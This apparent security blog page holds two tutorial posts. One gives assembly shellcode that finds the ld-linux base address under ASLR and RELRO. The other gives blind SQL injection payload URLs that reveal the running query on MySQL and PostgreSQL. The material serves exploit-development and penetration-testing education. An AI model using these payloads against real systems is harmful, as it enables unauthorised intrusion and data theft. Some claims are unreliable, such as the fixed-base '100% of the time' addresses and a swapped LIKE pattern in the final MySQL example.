March 20, 2015

Resolving the Base Pointer of the Linux Program Interpreter with Shellcode

Oftentimes an exploit developer desires the ability to call functions from shared libraries with their shellcode and a guarantee of proper function resolution. The way that the Linux Executable and Linkable Format (ELF) Application Binary Interface (ABI) works, a program interpreter (nearly always ld-linux) is specified in the binary's .INTERP section. When a program is executed, the program interpreter loads all of the associated shared libraries and then populates the program's import table, called the Global Offset Table (GOT), with pointers to the appropriate functions.

Because of Address Space Layout Randomization (ASLR), the pointers to these shared libraries and functions are different each execution of the program. This can make calling functions not referenced in an application's GOT from shellcode more difficult. By isolating the address space of the program interpreter, it is possible to parse its binary format and re-use its code to load shared objects and call functions not referenced by an application's import table. The code examples here cover locating the memory space of ld-linux; however they do not cover the code integration aspect. That will be covered either here at a later date, in our planned shellcode workshop, or both.

The GOT can be populated one of two ways, depending on the mode of relocate read-only (RELRO) selected at compile-time:

  1. Partial RELRO contexts populate the GOT as the functions are needed.
  2. Full RELRO contexts populate the entire GOT before jumping to the application's entry point.

Helpful VMA's

Before diving into resolution of the program interpreter, the reader should note the following Virtual Memory Addresses (VMAs) which are present 100% of the time for their ABI/Architecture.

ELF32

  • 0x8048000 is the base pointer of the currently executing binary, 100% of the time.
  • 0x80480bc contains a 4-byte VMA that is a pointer to the currently executing binary's DYNAMIC section.

ELF64

  • 0x400000 is the base pointer of the currently executing binary, 100% of the time.
  • 0x400130 contains a 4-byte VMA that is a pointer to the currently executing binary's DYNAMIC section.

Partial RELRO

The partial RELRO context is default on most variants of GCC on Linux; and does not clean up all of the references to ld-linux at runtime. In fact, in partial RELRO contexts, the program interpreter leaves behind a small gem, a pointer to _dl_runtime_resolve. This pointer is left at the third index of the Procedure Linkage Table (PLT) so that functions can be resolved as they are called. Simply migrating backwards in memory space from _dl_runtime_resolve until ELF magic (0x7f 0x45 0x4c 0x46) is reached can isolate the base pointer of ld-linux on partial RELRO contexts.

The example code below locates .GOT.PLT[2] by traversing through the dynamic section. Starting at the dynamic section, the next occurance of a pointer to the dynamic section is always .GOT.PLT[0]. This code places the ld-linux base pointer into the %rcx register.

# ABI="ELF64"
.section .text
.global main
main:             
  # read the dynamic header
  push $0x400130ff
  pop %rbx
  shr $0x08, %ebx          #  %rbx  = 0x400130
                           # (%rbx) = location of dynamic section

skip_to_dynamic:  
  # this is a vma, so 32 bit reg is fine.
  mov (%rbx), %esi         # put dynamic section location into %rsi

fix_dflag:        
  cld                      # make the dflag go forwards...

find_got_plt:     
  # Search past the dynamic section until it finds
  # another pointer to the dynamic section.  This
  # will be the beginning of .got.plt
  lodsl                    # lodsl for magically short searching
  cmpl %eax, (%rbx)        # save a couple bytes because its a vma.
  jne find_got_plt

found_resolver:   
  mov 0xc(%rsi), %rcx      # %rcx = qword pointer to resolver
                           # usually _dl_runtime_resolve (.got.plt[2])

find_base:        
  xor %cl, %cl             # it'll be an address ending in 00
                           # if this doesn't happen, it may also find false bases
                           
  cmpl $0x464c457f, (%rcx) # check for ELF magic
  loopne find_base         # loopne automatically does a dec %rcx

libdl_base_found: 
  # Make %rcx a direct pointer to libdl_base after that,
  # the loop decrements it one too many times.
  inc %rcx
compile/assemble: gcc partial-relro.s -o partial_relro

There is still a problem with this example, though. This code can't isolate the base pointer in a full RELRO environment. In a full RELRO environment, the PLT is cleaned up a bit and pointers to the resolver are removed before jumping to the entry point. After a lot of observations at runtime using gdb, and inspecting executable files on-disk using the readelf utility, a solution was devised.

Full RELRO

After looking at many binaries, it was discovered that every dynamic section contains a pointer to the PLT. In every single binary observed, the pointer just before this points to a DEBUG section (blank on disk). In gdb this section is recognized as r_debug. The fifth pointer in r_debug (offset 0x10 in 32 bit and offset 0x20 in 64 bit) is a pointer directly to the ld-linux base. So the process is as follows:

  1. Traverse to the dynamic section.
  2. Find got.plt by looping fowards in memory until a pointer to _DYNAMIC_ is found.
  3. Loop backwards in memory from got.plt until a pointer to got.plt is found.
  4. Grab the pointer just before the pointer to .got.plt, this is a pointer to DEBUG.
  5. Put the fifth pointer in DEBUG into a register -- this is the base pointer to ld-linux.

The ELF32 proof-of-concept code below illustrates this process effectively, placing the base pointer into the ebx register. Note it is compiled with gcc's "-s" option, which removes debug information from the on-disk binary. The ABI populates the DEBUG segment this code uses at runtime, which is why this code works.

# ABI="ELF32"
.section .text
.global main
main:
  mov 0x80480bc, %ebx   # move pointer to _DYNAMIC_ into ebx
  push %ebx
  pop %esi              # copy ptr to esi


find_got:               # loop until the GOT is found
  lodsl
  cmp %ebx, %eax
  jne find_got


find_debug:             # loop backwards until a pointer
  xchg %ebx, %esi       # to GOT is found
  sub $0x4, %ebx

find_debug_loop:
  lodsl
  cmp %ebx, %eax
  jne find_debug_loop


found_debug:
  mov -0xc(%esi), %eax  # Grab the entry in the symbol table 
                        # before GOT (r_debug)

get_interp_base:        # move the fifth pointer in DEBUG
  mov 0x10(%eax), %ebx  # into ebx - ptr to ld-linux base
compile/assemble: gcc -fstack-protector-all -s -fPIE -Wl,-z,relro,-z,now relro-ld-basefinder.s -o relro-ld-basefinder

This technique works on ELF64 as well as ELF32. It also appears to work regardless of whether the above compile options are present, and thusly is a reliable method for determining the address of ld-linux's ELF magic. This code has been used to start a new abicode project on our github.

Update - ELF64 version of the above code for full relro added to abicode. These "full relro" versions work in partial relro and non-relro environments too.

Related Links & Resources

March 19, 2015

Enumerating the Currently Executing Query Context with SQL Injection

There are many times when performing a penetration test that an auditor can run into a blind SQL injection vulnerability. In some cases, the vulnerability is not actually blind and can be accessed using a union select or joint select statement; however in-band exploitation is impossible without knowing the SQL query generated by the vulnerable application. This post will guide the reader through usable queries for enumeration that can be leveraged to discover the SQL statement currently being exploited. It assumes that the reader already understands how to enumerate data through an SQL injection vulnerability.

The Currently Executing Query

The queries here were tested on MySQL Server version 5.1 (documentation) and PostgreSQL Server version 9.1 (documentation); to test these without an environment, use the SQL Fiddle. In MySQL, the following query returns itself:

mysql> select info from information_schema.processlist where id=connection_id();
+--------------------------------------------------------------------------+
| info                                                                     |
+--------------------------------------------------------------------------+
| select info from information_schema.processlist where id=connection_id() |
+--------------------------------------------------------------------------+
1 row in set (0.12 sec)

Similarly, in PostgreSQL 9.1, the query below will suffice:

select query from pg_stat_activity where pid=pg_backend_pid();

When injecting into a query, these payloads can be used to discover the context of the query being injected; but there is a crucial problem yet to solve, addressed below.

Challenges Introduced by Enumeration

When enumerating data, a URL may look similar to:
http://domain.tld/file.ext?id=1 and [query][comparison]

Enumerating data can take 8 requests to retrieve a single byte, and works by asking the server to perform a series of comparisons (yes or no questions) until a value can be isolated. Because the comparisons are changing as the value of the data is being discovered, attempting to run the above queries on their own using an automated tool through an injection would probably fail when the tool begins attempting to enumerate data that it is changing each request.

To compensate for this, a "needle" can be inserted into a MySQL query by assigning a value to a variable. This needle can then be used as a marker to determine when to stop enumerating the data, or even to select only parts of the executing query that do not change. Suppose table `entry' is accessed by the vulnerable page, running the following query:

mysql> select * from entry where id=1;
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.02 sec)

The important part of the query in this situation that a remote attacker can't see is "select * from entry where id=". A valid injection to set the variable "myvar" may look like:

http://domain.tld/file.ext?id=1 and @myvar:=10

Which would turn the query into:

select * from entry where id=1 and @myvar:=10;

The purpose of defining a variable is not to use it at any point, however to inject it as a marker. It can be used as a needle when passed as an argument to MySQL's substring_index() function. A union select example illustrates this below:

mysql> select * from entry where id=1 and @myvar:=10
    -> union select 1,substring_index(
    ->   (select info from information_schema.processlist where id=connection_id()),
    ->   '@myvar',
    ->   1);
+----+-------------------------------------+
| id | name                                |
+----+-------------------------------------+
|  1 | First entry                         |
|  1 | select * from entry where id=1 and  |
+----+-------------------------------------+
2 rows in set (0.00 sec)

Notice that the second line containing the output of the union select is the currently executing SQL query only UP TO the point of the injected needle. This example won't work during a blind SQL injection, though. A url to enumerate the information with blind SQL injection may look something like:

http://domain.tld/file.ext?id=1 and @myvar:=10 and ascii(substring(substring_index(
(select info from information_schema.processlist where id=connection_id()),'@myvar'
,1),1,1)) between 0 and 255
(Newlines added for legibility)

The above query should always be true on MySQL databases, because the ascii code of the first character of the query being executed should always be between 0 and 255. It would generate the following query and output as a "true" statement:

mysql> select * from entry where id=1 and @myvar:=10
    -> and ascii(substring(substring_index(
    -> (select info from information_schema.processlist where id=connection_id()),
    -> '@myvar',
    -> 1),1,1)) between 0 and 255;
+----+-------------+
| id | name        |
+----+-------------+
|  1 | First entry |
+----+-------------+
1 row in set (0.05 sec)

Unfortunately, the info column of MySQL's information_schema.processlist table will not contain comments in the query, and thusly they cannot be used as needles during injection.

PostgreSQL, on the other hand, does not have a substring_index() function. It provides the same feature using a function called split_part(). PostgreSQL also wont let developers use WHERE clauses for in-line variable definitions. On the bright side, PostgreSQL does retrieve comments from its "pg_stat_activity" view. An example enumeration URL for a PostgreSQL injection:

http://domain.tld/file.ext?id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid()),'/*marker*/',1),1,1)) 
between 0 and 255
(Newlines added for legibility)

This may turn the query into something like:

select * from entry where id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid()),'/*marker*/',1),1,1)) 
between 0 and 255
(Newlines added for legibility)

There are some rare edge cases in which multiple queries will be executing within the PID context. This can happen because of INSERT DELAYED statements or a variety of other concurrency tricks (like triggers). In order to be sure the query only returns the correct row, consider appending a LIKE condition and a limit clause (be sure to urlencode the "%" SQL wildcard character as %25):

http://domain.tld/file.ext?id=1/*marker*/ and ascii(substring(split_part((select 
query from pg_stat_activity where pid=pg_backend_pid() and query like '%marker%'
limit 1),'/*marker*/',1),1,1)) between 0 and 255
(Newlines added for legibility)

A similar clause will work on MySQL:

http://domain.tld/file.ext?id=1 and @myvar:=10 and ascii(substring(substring_index(
(select info from information_schema.processlist where id=connection_id() and info
like '@myvar' limit 1),'%@myvar%',1),1,1)) between 0 and 255
(Newlines added for legibility)

Being able to determine a query context like this can be a valuable skill; it may be possible to extract data with methods better than blind enumeration once the query has been revealed. More on this topic will be addressed in our upcoming SQL injection workshop.

In closing, as this is the first post here, it has to be said: please use these techniques responsibly. Respect your internet neighbors and always do the right thing.